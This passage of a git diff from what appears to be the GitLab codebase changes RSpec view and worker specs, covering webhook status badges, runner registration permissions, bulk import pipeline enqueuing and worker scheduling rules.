b/spec/tooling/rspec_flaky/report_spec.rb index 6c364cd5cd3..ffd0cd987aa 100644 --- a/spec/tooling/rspec_flaky/report_spec.rb +++ b/spec/tooling/rspec_flaky/report_spec.rb @@ -2,9 +2,11 @@ require 'tempfile' +require_relative '../../support/time_travel' + require_relative '../../../tooling/rspec_flaky/report' -RSpec.describe RspecFlaky::Report, :aggregate_failures do +RSpec.describe RspecFlaky::Report, :aggregate_failures, :freeze_time do let(:thirty_one_days) { 3600 * 24 * 31 } let(:collection_hash) do { diff --git a/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb b/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb index 72e32643a49..18a2e29adab 100644 --- a/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb +++ b/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb @@ -28,6 +28,9 @@ RSpec.describe 'admin/application_settings/_package_registry' do expect(rendered).to have_field('Maximum Conan package file size in bytes', type: 'number') expect(page.find_field('Maximum Conan package file size in bytes').value).to eq(default_plan_limits.conan_max_file_size.to_s) + expect(rendered).to have_field('Maximum Helm chart file size in bytes', type: 'number') + expect(page.find_field('Maximum Helm chart file size in bytes').value).to eq(default_plan_limits.helm_max_file_size.to_s) + expect(rendered).to have_field('Maximum Maven package file size in bytes', type: 'number') expect(page.find_field('Maximum Maven package file size in bytes').value).to eq(default_plan_limits.maven_max_file_size.to_s) diff --git a/spec/views/groups/new.html.haml_spec.rb b/spec/views/groups/new.html.haml_spec.rb new file mode 100644 index 00000000000..8b12cc42a88 --- /dev/null +++ b/spec/views/groups/new.html.haml_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'groups/new.html.haml' do + let_it_be(:user) { create(:user) } + let_it_be(:group) { build(:group, namespace_settings: build(:namespace_settings)) } + + before do + assign(:group, group) + assign(:current_user, user) + + allow(view).to receive(:current_user).and_return(user) + allow(view).to receive(:captcha_required?).and_return(false) + allow(view).to receive(:import_sources_enabled?).and_return(false) + + render + end + + describe 'setup_for_company field' do + it 'does not have a default selection', :aggregate_failures do + expect(rendered).to have_field('My company or team') + expect(rendered).not_to have_checked_field('My company or team') + expect(rendered).to have_field('Just me') + expect(rendered).not_to have_checked_field('Just me') + end + end +end diff --git a/spec/views/groups/runners/_group_runners.html.haml_spec.rb b/spec/views/groups/runners/_group_runners.html.haml_spec.rb index 0d47409c658..3a8686ab046 100644 --- a/spec/views/groups/runners/_group_runners.html.haml_spec.rb +++ b/spec/views/groups/runners/_group_runners.html.haml_spec.rb @@ -11,12 +11,11 @@ RSpec.describe 'groups/runners/group_runners.html.haml' do @group = group allow(view).to receive(:current_user).and_return(user) allow(view).to receive(:reset_registration_token_group_settings_ci_cd_path).and_return('banana_url') - allow(view).to receive(:can?).with(user, :admin_pipeline, group).and_return(true) end context 'when group runner registration is allowed' do before do - stub_application_setting(valid_runner_registrars: ['group']) + allow(view).to receive(:can?).with(user, :register_group_runners, group).and_return(true) end it 'enables the Remove group button for a group' do @@ -29,7 +28,7 @@ RSpec.describe 'groups/runners/group_runners.html.haml' do context 'when group runner registration is not allowed' do before do - stub_application_setting(valid_runner_registrars: ['project']) + allow(view).to receive(:can?).with(user, :register_group_runners, group).and_return(false) end it 'does not enable the the Remove group button for a group' do diff --git a/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb b/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb deleted file mode 100644 index 0a4d283a983..00000000000 --- a/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb +++ /dev/null @@ -1,30 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'jira_connect/subscriptions/index.html.haml' do - let(:user) { build_stubbed(:user) } - - before do - allow(view).to receive(:current_user).and_return(user) - assign(:subscriptions, create_list(:jira_connect_subscription, 1)) - end - - context 'when the user is signed in' do - it 'shows link to user profile' do - render - - expect(rendered).to have_link(user.to_reference) - end - end - - context 'when the user is not signed in' do - let(:user) { nil } - - it 'shows "Sign in" link' do - render - - expect(rendered).to have_link('Sign in to GitLab') - end - end -end diff --git a/spec/views/layouts/_head.html.haml_spec.rb b/spec/views/layouts/_head.html.haml_spec.rb index 2c7289deaef..f9725c73d05 100644 --- a/spec/views/layouts/_head.html.haml_spec.rb +++ b/spec/views/layouts/_head.html.haml_spec.rb @@ -62,7 +62,7 @@ RSpec.describe 'layouts/_head' do expect(rendered).to match('<link rel="stylesheet" media="print" href="/stylesheets/highlight/themes/solarised-light.css" />') end - context 'when an asset_host is set and snowplow url is set' do + context 'when an asset_host is set and snowplow url is set', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/346542' do let(:asset_host) { 'http://test.host' } let(:snowplow_collector_hostname) { 'www.snow.plow' } diff --git a/spec/views/layouts/header/_new_dropdown.haml_spec.rb b/spec/views/layouts/header/_new_dropdown.haml_spec.rb index 47abfff87bb..208da345e7f 100644 --- a/spec/views/layouts/header/_new_dropdown.haml_spec.rb +++ b/spec/views/layouts/header/_new_dropdown.haml_spec.rb @@ -6,33 +6,13 @@ RSpec.describe 'layouts/header/_new_dropdown' do let_it_be(:user) { create(:user) } shared_examples_for 'invite member quick link' do - context 'when an experiment is active' do - before do - allow(Gitlab::Experimentation).to receive(:active?).and_return(true) - allow(view).to receive(:experiment_tracking_category_and_group) - allow(view).to receive(:tracking_label) - end - - context 'with ability to invite members' do - it { is_expected.to have_link('Invite members', href: href) } - - it 'records the experiment' do - subject - - expect(view).to have_received(:experiment_tracking_category_and_group) - .with(:invite_members_new_dropdown) - expect(view).to have_received(:tracking_label) - end - end - - context 'without ability to invite members' do - let(:invite_member) { false } - - it { is_expected.not_to have_link('Invite members') } - end + context 'with ability to invite members' do + it { is_expected.to have_link('Invite members', href: href) } end - context 'when experiment is not active' do + context 'without ability to invite members' do + let(:invite_member) { false } + it { is_expected.not_to have_link('Invite members') } end end @@ -72,7 +52,6 @@ RSpec.describe 'layouts/header/_new_dropdown' do allow(view).to receive(:can?).with(user, :create_projects, group).and_return(true) allow(view).to receive(:can?).with(user, :admin_group_member, group).and_return(invite_member) allow(view).to receive(:can_admin_project_member?).and_return(invite_member) - allow(view).to receive(:experiment_enabled?) end subject do diff --git a/spec/views/profiles/keys/_form.html.haml_spec.rb b/spec/views/profiles/keys/_form.html.haml_spec.rb index 0f4d7ecc699..d5a605958dc 100644 --- a/spec/views/profiles/keys/_form.html.haml_spec.rb +++ b/spec/views/profiles/keys/_form.html.haml_spec.rb @@ -33,8 +33,8 @@ RSpec.describe 'profiles/keys/_form.html.haml' do end it 'has the expires at field', :aggregate_failures do - expect(rendered).to have_field('Expires at', type: 'date') - expect(page.find_field('Expires at')['min']).to eq(l(1.day.from_now, format: "%Y-%m-%d")) + expect(rendered).to have_field('Expiration date', type: 'date') + expect(page.find_field('Expiration date')['min']).to eq(l(1.day.from_now, format: "%Y-%m-%d")) expect(rendered).to have_text('Key can still be used after expiration.') end diff --git a/spec/views/projects/buttons/_dropdown.html.haml_spec.rb b/spec/views/projects/buttons/_dropdown.html.haml_spec.rb deleted file mode 100644 index fc9d7c3ea91..00000000000 --- a/spec/views/projects/buttons/_dropdown.html.haml_spec.rb +++ /dev/null @@ -1,42 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'projects/buttons/_dropdown' do - let(:user) { create(:user) } - - context 'user with all abilities' do - before do - assign(:project, project) - - allow(view).to receive(:current_user).and_return(user) - allow(view).to receive(:can?).with(user, :push_code, project).and_return(true) - allow(view).to receive(:can_collaborate_with_project?).and_return(true) - end - - context 'empty repository' do - let(:project) { create(:project, :empty_repo) } - - it 'has a link to create a new file' do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).to have_link('New file') - end - - it 'does not have a link to create a new branch' do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).not_to have_link('New branch') - end - - it 'does not have a link to create a new tag' do - render - - expect(view).to render_template('projects/buttons/_dropdown') - expect(rendered).not_to have_link('New tag') - end - end - end -end diff --git a/spec/views/projects/edit.html.haml_spec.rb b/spec/views/projects/edit.html.haml_spec.rb index 60f4c1664f7..8c96f286c79 100644 --- a/spec/views/projects/edit.html.haml_spec.rb +++ b/spec/views/projects/edit.html.haml_spec.rb @@ -92,6 +92,22 @@ RSpec.describe 'projects/edit' do end end + context 'squash template' do + it 'displays a placeholder if none is set' do + render + + expect(rendered).to have_field('project[squash_commit_template]', placeholder: '%{title}') + end + + it 'displays the user entered value' do + project.update!(squash_commit_template: '%{first_multiline_commit}') + + render + + expect(rendered).to have_field('project[squash_commit_template]', with: '%{first_multiline_commit}') + end + end + context 'forking' do before do assign(:project, project) diff --git a/spec/views/projects/hooks/edit.html.haml_spec.rb b/spec/views/projects/hooks/edit.html.haml_spec.rb new file mode 100644 index 00000000000..c4ec2149794 --- /dev/null +++ b/spec/views/projects/hooks/edit.html.haml_spec.rb @@ -0,0 +1,58 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'projects/hooks/edit' do + let(:hook) { create(:project_hook, project: project) } + + let_it_be_with_refind(:project) { create(:project) } + + before do + assign :project, project + assign :hook, hook + end + + it 'renders webhook page with "Recent events"' do + render + + expect(rendered).to have_css('h4', text: _('Webhook')) + expect(rendered).to have_text(_('Recent events')) + end + + context 'webhook is rate limited' do + before do + allow(hook).to receive(:rate_limited?).and_return(true) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook was automatically disabled')) + end + end + + context 'webhook is permanently disabled' do + before do + allow(hook).to receive(:permanently_disabled?).and_return(true) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook failed to connect')) + end + end + + context 'webhook is temporarily disabled' do + before do + allow(hook).to receive(:temporarily_disabled?).and_return(true) + allow(hook).to receive(:disabled_until).and_return(Time.now + 10.minutes) + end + + it 'renders alert' do + render + + expect(rendered).to have_text(s_('Webhooks|Webhook fails to connect')) + end + end +end diff --git a/spec/views/projects/hooks/index.html.haml_spec.rb b/spec/views/projects/hooks/index.html.haml_spec.rb new file mode 100644 index 00000000000..0cdc3bcecb2 --- /dev/null +++ b/spec/views/projects/hooks/index.html.haml_spec.rb @@ -0,0 +1,62 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'projects/hooks/index' do + let(:existing_hook) { create(:project_hook, project: project) } + let(:new_hook) { ProjectHook.new } + + let_it_be_with_refind(:project) { create(:project) } + + before do + assign :project, project + assign :hooks, [existing_hook] + assign :hook, new_hook + end + + it 'renders webhooks page with "Project Hooks"' do + render + + expect(rendered).to have_css('h4', text: _('Webhooks')) + expect(rendered).to have_text('Project Hooks') + expect(rendered).not_to have_css('.gl-badge', text: _('Disabled')) + expect(rendered).not_to have_css('.gl-badge', text: s_('Webhooks|Failed to connect')) + expect(rendered).not_to have_css('.gl-badge', text: s_('Webhooks|Fails to connect')) + end + + context 'webhook is rate limited' do + before do + allow(existing_hook).to receive(:rate_limited?).and_return(true) + end + + it 'renders "Disabled" badge' do + render + + expect(rendered).to have_css('.gl-badge', text: _('Disabled')) + end + end + + context 'webhook is permanently disabled' do + before do + allow(existing_hook).to receive(:permanently_disabled?).and_return(true) + end + + it 'renders "Failed to connect" badge' do + render + + expect(rendered).to have_css('.gl-badge', text: s_('Webhooks|Failed to connect')) + end + end + + context 'webhook is temporarily disabled' do + before do + allow(existing_hook).to receive(:temporarily_disabled?).and_return(true) + end + + it 'renders "Fails to connect" badge' do + render + + expect(rendered).to have_css('.gl-badge', text: s_('Webhooks|Fails to connect')) + end + end +end diff --git a/spec/views/projects/jobs/show.html.haml_spec.rb b/spec/views/projects/jobs/show.html.haml_spec.rb index 83a00135629..8242d20a9e7 100644 --- a/spec/views/projects/jobs/show.html.haml_spec.rb +++ b/spec/views/projects/jobs/show.html.haml_spec.rb @@ -13,26 +13,47 @@ RSpec.describe 'projects/jobs/show' do end before do - assign(:build, build.present) assign(:project, project) assign(:builds, builds) allow(view).to receive(:can?).and_return(true) end - context 'when job is running' do - let(:build) { create(:ci_build, :trace_live, :running, pipeline: pipeline) } - + context 'when showing a CI build' do before do + assign(:build, build.present) render end - it 'does not show retry button' do - expect(rendered).not_to have_link('Retry') + it 'shows job vue app' do + expect(rendered).to have_css('#js-job-page') + expect(rendered).not_to have_css('#js-bridge-page') + end + + context 'when job is running' do + let(:build) { create(:ci_build, :trace_live, :running, pipeline: pipeline) } + + it 'does not show retry button' do + expect(rendered).not_to have_link('Retry') + end + + it 'does not show New issue button' do + expect(rendered).not_to have_link('New issue') + end + end + end + + context 'when showing a bridge job' do + let(:bridge) { create(:ci_bridge, status: :pending) } + + before do + assign(:build, bridge) + render end - it 'does not show New issue button' do - expect(rendered).not_to have_link('New issue') + it 'shows bridge vue app' do + expect(rendered).to have_css('#js-bridge-page') + expect(rendered).not_to have_css('#js-job-page') end end end diff --git a/spec/views/shared/runners/_runner_details.html.haml_spec.rb b/spec/views/shared/runners/_runner_details.html.haml_spec.rb index f9f93c8160b..cdf5ec563d0 100644 --- a/spec/views/shared/runners/_runner_details.html.haml_spec.rb +++ b/spec/views/shared/runners/_runner_details.html.haml_spec.rb @@ -113,14 +113,14 @@ RSpec.describe 'shared/runners/_runner_details.html.haml' do describe 'Tags value' do context 'when runner does not have tags' do it { is_expected.to have_content('Tags') } - it { is_expected.not_to have_selector('span.badge.badge-primary')} + it { is_expected.not_to have_selector('span.gl-badge.badge.badge-info')} end context 'when runner have tags' do let(:runner) { create(:ci_runner, tag_list: %w(tag2 tag3 tag1)) } it { is_expected.to have_content('Tags tag1 tag2 tag3') } - it { is_expected.to have_selector('span.badge.badge-primary')} + it { is_expected.to have_selector('span.gl-badge.badge.badge-info')} end end diff --git a/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb b/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb index 400319a42b7..1bee9f7463f 100644 --- a/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb +++ b/spec/views/shared/ssh_keys/_key_details.html.haml_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe 'shared/ssh_keys/_key_delete.html.haml' do context 'when the text parameter is used' do it 'has text' do - render 'shared/ssh_keys/key_delete.html.haml', text: 'Button', html_class: '', button_data: '' + render partial: 'shared/ssh_keys/key_delete', formats: :html, locals: { text: 'Button', html_class: '', button_data: '' } expect(rendered).to have_button('Button') end @@ -12,7 +12,7 @@ RSpec.describe 'shared/ssh_keys/_key_delete.html.haml' do context 'when the text parameter is not used' do it 'does not have text' do - render 'shared/ssh_keys/key_delete.html.haml', html_class: '', button_data: '' + render partial: 'shared/ssh_keys/key_delete', formats: :html, locals: { html_class: '', button_data: '' } expect(rendered).to have_button('Delete') end diff --git a/spec/workers/background_migration_worker_spec.rb b/spec/workers/background_migration_worker_spec.rb index 7892eb89e80..4297e55ca6c 100644 --- a/spec/workers/background_migration_worker_spec.rb +++ b/spec/workers/background_migration_worker_spec.rb @@ -3,148 +3,5 @@ require 'spec_helper' RSpec.describe BackgroundMigrationWorker, :clean_gitlab_redis_shared_state do - let(:worker) { described_class.new } - - describe '.minimum_interval' do - it 'returns 2 minutes' do - expect(described_class.minimum_interval).to eq(2.minutes.to_i) - end - end - - describe '#perform' do - before do - allow(worker).to receive(:jid).and_return(1) - allow(worker).to receive(:always_perform?).and_return(false) - end - - it 'can run scheduled job and retried job concurrently' do - expect(Gitlab::BackgroundMigration) - .to receive(:perform) - .with('Foo', [10, 20]) - .exactly(2).time - - worker.perform('Foo', [10, 20]) - worker.perform('Foo', [10, 20], described_class::MAX_LEASE_ATTEMPTS - 1) - end - - context 'when lease can be obtained' do - before do - expect(Gitlab::BackgroundMigration) - .to receive(:perform) - .with('Foo', [10, 20]) - end - - it 'performs a background migration' do - worker.perform('Foo', [10, 20]) - end - - context 'when lease_attempts is 1' do - it 'performs a background migration' do - worker.perform('Foo', [10, 20], 1) - end - end - end - - context 'when lease not obtained (migration of same class was performed recently)' do - before do - expect(Gitlab::BackgroundMigration).not_to receive(:perform) - - worker.lease_for('Foo', false).try_obtain - end - - it 'reschedules the migration and decrements the lease_attempts' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) - - worker.perform('Foo', [10, 20], 5) - end - - context 'when lease_attempts is 1' do - before do - worker.lease_for('Foo', true).try_obtain - end - - it 'reschedules the migration and decrements the lease_attempts' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 0) - - worker.perform('Foo', [10, 20], 1) - end - end - - context 'when lease_attempts is 0' do - before do - worker.lease_for('Foo', true).try_obtain - end - - it 'gives up performing the migration' do - expect(described_class).not_to receive(:perform_in) - expect(Sidekiq.logger).to receive(:warn).with( - class: 'Foo', - message: 'Job could not get an exclusive lease after several tries. Giving up.', - job_id: 1) - - worker.perform('Foo', [10, 20], 0) - end - end - end - - context 'when database is not healthy' do - before do - allow(worker).to receive(:healthy_database?).and_return(false) - end - - it 'reschedules a migration if the database is not healthy' do - expect(described_class) - .to receive(:perform_in) - .with(a_kind_of(Numeric), 'Foo', [10, 20], 4) - - worker.perform('Foo', [10, 20]) - end - - context 'when lease_attempts is 0' do - it 'gives up performing the migration' do - expect(described_class).not_to receive(:perform_in) - expect(Sidekiq.logger).to receive(:warn).with( - class: 'Foo', - message: 'Database was unhealthy after several tries. Giving up.', - job_id: 1) - - worker.perform('Foo', [10, 20], 0) - end - end - end - - it 'sets the class that will be executed as the caller_id' do - expect(Gitlab::BackgroundMigration).to receive(:perform) do - expect(Gitlab::ApplicationContext.current).to include('meta.caller_id' => 'Foo') - end - - worker.perform('Foo', [10, 20]) - end - end - - describe '#healthy_database?' do - context 'when replication lag is too great' do - it 'returns false' do - allow(Postgresql::ReplicationSlot) - .to receive(:lag_too_great?) - .and_return(true) - - expect(worker.healthy_database?).to eq(false) - end - - context 'when replication lag is small enough' do - it 'returns true' do - allow(Postgresql::ReplicationSlot) - .to receive(:lag_too_great?) - .and_return(false) - - expect(worker.healthy_database?).to eq(true) - end - end - end - end + it_behaves_like 'it runs background migration jobs', 'main', :background_migration_database_health_reschedules end diff --git a/spec/workers/build_hooks_worker_spec.rb b/spec/workers/build_hooks_worker_spec.rb index 5f7e7e5fb00..a69e188b441 100644 --- a/spec/workers/build_hooks_worker_spec.rb +++ b/spec/workers/build_hooks_worker_spec.rb @@ -23,14 +23,6 @@ RSpec.describe BuildHooksWorker do end end - describe '.perform_async' do - it 'delays scheduling a job by calling perform_in with default delay' do - expect(described_class).to receive(:perform_in).with(ApplicationWorker::DEFAULT_DELAY_INTERVAL.second, 123) - - described_class.perform_async(123) - end - end - it_behaves_like 'worker with data consistency', described_class, data_consistency: :delayed diff --git a/spec/workers/bulk_imports/entity_worker_spec.rb b/spec/workers/bulk_imports/entity_worker_spec.rb index deae15a3ca2..ce45299c7f7 100644 --- a/spec/workers/bulk_imports/entity_worker_spec.rb +++ b/spec/workers/bulk_imports/entity_worker_spec.rb @@ -14,96 +14,118 @@ RSpec.describe BulkImports::EntityWorker do ) end - it 'enqueues the first stage pipelines work' do - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil - ) - end + let(:job_args) { entity.id } - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .with( - pipeline_tracker.id, - pipeline_tracker.stage, - entity.id - ) + it 'updates pipeline trackers to enqueued state when selected' do + worker = BulkImports::EntityWorker.new - subject.perform(entity.id) - end + next_tracker = worker.send(:next_pipeline_trackers_for, entity.id).first - it 'do not enqueue a new pipeline job if the current stage still running' do - expect(BulkImports::PipelineWorker) - .not_to receive(:perform_async) + next_tracker.reload - subject.perform(entity.id, 0) - end - - it 'enqueues the next stage pipelines when the current stage is finished' do - next_stage_pipeline_tracker = create( - :bulk_import_tracker, - entity: entity, - pipeline_name: 'Stage1::Pipeline', - stage: 1 - ) + expect(next_tracker.enqueued?).to be_truthy - pipeline_tracker.fail_op! + expect(worker.send(:next_pipeline_trackers_for, entity.id)) + .not_to include(next_tracker) + end - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) + include_examples 'an idempotent worker' do + it 'enqueues the first stage pipelines work' do + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + # the worker runs twice but only executes once + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil + ) + end + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: 0 + pipeline_tracker.id, + pipeline_tracker.stage, + entity.id ) + + subject end - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .with( - next_stage_pipeline_tracker.id, - next_stage_pipeline_tracker.stage, - entity.id - ) + it 'logs and tracks the raised exceptions' do + exception = StandardError.new('Error!') + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) + .and_raise(exception) + + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil + ) + + expect(logger) + .to receive(:error) + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: nil, + error_message: 'Error!' + ) + end + + expect(Gitlab::ErrorTracking) + .to receive(:track_exception) + .with(exception, entity_id: entity.id) + + subject + end - subject.perform(entity.id, 0) - end + context 'in first stage' do + let(:job_args) { [entity.id, 0] } - it 'logs and tracks the raised exceptions' do - exception = StandardError.new('Error!') + it 'do not enqueue a new pipeline job if the current stage still running' do + expect(BulkImports::PipelineWorker) + .not_to receive(:perform_async) - expect(BulkImports::PipelineWorker) - .to receive(:perform_async) - .and_raise(exception) + subject + end - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger) - .to receive(:info) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil + it 'enqueues the next stage pipelines when the current stage is finished' do + next_stage_pipeline_tracker = create( + :bulk_import_tracker, + entity: entity, + pipeline_name: 'Stage1::Pipeline', + stage: 1 ) - expect(logger) - .to receive(:error) - .with( - worker: described_class.name, - entity_id: entity.id, - current_stage: nil, - error_message: 'Error!' - ) + pipeline_tracker.fail_op! + + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info).twice + .with( + worker: described_class.name, + entity_id: entity.id, + current_stage: 0 + ) + end + + expect(BulkImports::PipelineWorker) + .to receive(:perform_async) + .with( + next_stage_pipeline_tracker.id, + next_stage_pipeline_tracker.stage, + entity.id + ) + + subject + end end - - expect(Gitlab::ErrorTracking) - .to receive(:track_exception) - .with(exception, entity_id: entity.id) - - subject.perform(entity.id) end end diff --git a/spec/workers/bulk_imports/pipeline_worker_spec.rb b/spec/workers/bulk_imports/pipeline_worker_spec.rb index c902d1f2034..2da9195a6ef 100644 --- a/spec/workers/bulk_imports/pipeline_worker_spec.rb +++ b/spec/workers/bulk_imports/pipeline_worker_spec.rb @@ -60,18 +60,8 @@ RSpec.describe BulkImports::PipelineWorker do create( :bulk_import_tracker, entity: entity, - pipeline_name: 'FakePipeline' - ) - end - end - - it_behaves_like 'successfully runs the pipeline' do - let(:pipeline_tracker) do - create( - :bulk_import_tracker, - :started, - entity: entity, - pipeline_name: 'FakePipeline' + pipeline_name: 'FakePipeline', + status_event: 'enqueue' ) end end @@ -109,7 +99,8 @@ RSpec.describe BulkImports::PipelineWorker do pipeline_tracker = create( :bulk_import_tracker, entity: entity, - pipeline_name: 'InexistentPipeline' + pipeline_name: 'InexistentPipeline', + status_event: 'enqueue' ) expect_next_instance_of(Gitlab::Import::Logger) do |logger| @@ -150,7 +141,8 @@ RSpec.describe BulkImports::PipelineWorker do pipeline_tracker = create( :bulk_import_tracker, entity: entity, - pipeline_name: 'FakePipeline' + pipeline_name: 'FakePipeline', + status_event: 'enqueue' ) exception = BulkImports::NetworkError.new( @@ -163,7 +155,21 @@ RSpec.describe BulkImports::PipelineWorker do .and_raise(exception) end - expect(subject).to receive(:jid).and_return('jid') + expect(subject).to receive(:jid).and_return('jid').twice + + expect_any_instance_of(BulkImports::Tracker) do |tracker| + expect(tracker).to receive(:retry).and_call_original + end + + expect_next_instance_of(Gitlab::Import::Logger) do |logger| + expect(logger) + .to receive(:info) + .with( + worker: described_class.name, + pipeline_name: 'FakePipeline', + entity_id: entity.id + ) + end expect(described_class) .to receive(:perform_in) @@ -175,6 +181,10 @@ RSpec.describe BulkImports::PipelineWorker do ) subject.perform(pipeline_tracker.id, pipeline_tracker.stage, entity.id) + + pipeline_tracker.reload + + expect(pipeline_tracker.enqueued?).to be_truthy end end end @@ -200,7 +210,8 @@ RSpec.describe BulkImports::PipelineWorker do create( :bulk_import_tracker, entity: entity, - pipeline_name: 'NdjsonPipeline' + pipeline_name: 'NdjsonPipeline', + status_event: 'enqueue' ) end diff --git a/spec/workers/ci/pending_builds/update_group_worker_spec.rb b/spec/workers/ci/pending_builds/update_group_worker_spec.rb new file mode 100644 index 00000000000..8c6bf018158 --- /dev/null +++ b/spec/workers/ci/pending_builds/update_group_worker_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::PendingBuilds::UpdateGroupWorker do + describe '#perform' do + let(:worker) { described_class.new } + + context 'when a group is not provided' do + it 'does not call the service' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new) + end + end + + context 'when everything is ok' do + let(:group) { create(:group) } + let(:update_pending_build_service) { instance_double(::Ci::UpdatePendingBuildService) } + let(:update_params) { { "namespace_id" => group.id } } + + it 'calls the service' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).with(group, update_params).and_return(update_pending_build_service) + expect(update_pending_build_service).to receive(:execute) + + worker.perform(group.id, update_params) + end + + include_examples 'an idempotent worker' do + let(:pending_build) { create(:ci_pending_build) } + let(:update_params) { { "namespace_id" => pending_build.namespace_id } } + let(:job_args) { [pending_build.namespace_id, update_params] } + + it 'updates the pending builds' do + subject + + expect(pending_build.reload.namespace_id).to eq(update_params["namespace_id"]) + end + end + end + end +end diff --git a/spec/workers/ci/pending_builds/update_project_worker_spec.rb b/spec/workers/ci/pending_builds/update_project_worker_spec.rb new file mode 100644 index 00000000000..4a67127564e --- /dev/null +++ b/spec/workers/ci/pending_builds/update_project_worker_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::PendingBuilds::UpdateProjectWorker do + describe '#perform' do + let(:worker) { described_class.new } + + context 'when a project is not provided' do + it 'does not call the service' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new) + end + end + + context 'when everything is ok' do + let(:project) { create(:project) } + let(:group) { create(:group) } + let(:update_pending_build_service) { instance_double(::Ci::UpdatePendingBuildService) } + let(:update_params) { { "namespace_id" => group.id } } + + it 'calls the service' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).with(project, update_params).and_return(update_pending_build_service) + expect(update_pending_build_service).to receive(:execute) + + worker.perform(project.id, update_params) + end + + include_examples 'an idempotent worker' do + let(:pending_build) { create(:ci_pending_build) } + let(:job_args) { [pending_build.project_id, update_params] } + + it 'updates the pending builds' do + subject + + expect(pending_build.reload.namespace_id).to eq(update_params["namespace_id"]) + end + end + end + end +end diff --git a/spec/workers/concerns/application_worker_spec.rb b/spec/workers/concerns/application_worker_spec.rb index fbf39b3c7cd..7608b5f49a1 100644 --- a/spec/workers/concerns/application_worker_spec.rb +++ b/spec/workers/concerns/application_worker_spec.rb @@ -248,39 +248,40 @@ RSpec.describe ApplicationWorker do end describe '.perform_async' do - before do - stub_const(worker.name, worker) - end - - shared_examples_for 'worker utilizes load balancing capabilities' do |data_consistency| - before do - worker.data_consistency(data_consistency) - end - - it 'call perform_in' do - expect(worker).to receive(:perform_in).with(described_class::DEFAULT_DELAY_INTERVAL.seconds, 123) + using RSpec::Parameterized::TableSyntax - worker.perform_async(123) - end + where(:primary_only?, :skip_scheduling_ff, :data_consistency, :schedules_job?) do + true | false | :sticky | false + true | false | :delayed | false + true | false | :always | false + true | true | :sticky | false + true | true | :delayed | false + true | true | :always | false + false | false | :sticky | true + false | false | :delayed | true + false | false | :always | false + false | true | :sticky | false + false | true | :delayed | false + false | true | :always | false end - context 'when workers data consistency is :sticky' do - it_behaves_like 'worker utilizes load balancing capabilities', :sticky - end + before do + stub_const(worker.name, worker) + worker.data_consistency(data_consistency) - context 'when workers data consistency is :delayed' do - it_behaves_like 'worker utilizes load balancing capabilities', :delayed + allow(Gitlab::Database::LoadBalancing).to receive(:primary_only?).and_return(primary_only?) + stub_feature_flags(skip_scheduling_workers_for_replicas: skip_scheduling_ff) end - context 'when workers data consistency is :always' do - before do - worker.data_consistency(:always) - end - - it 'does not call perform_in' do - expect(worker).not_to receive(:perform_in) + with_them do + it 'schedules or enqueues the job correctly' do + if schedules_job? + expect(worker).to receive(:perform_in).with(described_class::DEFAULT_DELAY_INTERVAL.seconds, 123) + else + expect(worker).not_to receive(:perform_in) + end - worker.perform_async + worker.perform_async(123) end end end diff --git a/spec/workers/create_commit_signature_worker_spec.rb b/spec/workers/create_commit_signature_worker_spec.rb index d283ff5b732..0e31faf47af 100644 --- a/spec/workers/create_commit_signature_worker_spec.rb +++ b/spec/workers/create_commit_signature_worker_spec.rb @@ -143,7 +143,7 @@ RSpec.describe CreateCommitSignatureWorker do let(:type) { :X509 } it 'performs a single query for commit signatures' do - expect(X509CommitSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) + expect(CommitSignatures::X509CommitSignature).to receive(:by_commit_sha).with(commit_shas).once.and_return([]) subject end @@ -153,7 +153,7 @@ RSpec.describe 